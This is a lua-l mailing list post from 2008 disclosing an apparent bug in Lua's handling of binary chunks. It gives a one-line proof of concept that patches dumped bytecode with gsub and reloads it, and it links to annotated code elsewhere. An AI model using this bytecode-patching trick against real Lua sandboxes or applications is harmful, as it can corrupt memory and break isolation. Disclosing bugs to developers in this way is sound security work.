Another bug related to binary chunks?

lua-l archive

[Date Prev][Date Next][Thread Prev][Thread Next] [Date Index] [Thread Index]

Subject: Another bug related to binary chunks?
From: "Peter Cawley" <lua@...>
Date: Fri, 19 Sep 2008 16:58:41 +0100

Minimal exploitation (assumes sizeof(int)==sizeof(size_t)==4 and little-endian):
local a,b,c;loadstring(('').dump(function()X={a,b}X=c[b]end):gsub('\3...\2.....\2....','\1\0\0'))()

Nicer annotated code with explanation:
http://pastebin.com/f281b0a36

Prev by Date: Re: Lpeg and malformed input / Lpeg and subjects that do not fit into memory
Next by Date: WxLua Presentation video at Lua Workshop
Previous by thread: Re: Lpeg and malformed input / Lpeg and subjects that do not fit into memory
Next by thread: WxLua Presentation video at Lua Workshop
Index(es):
- Date
- Thread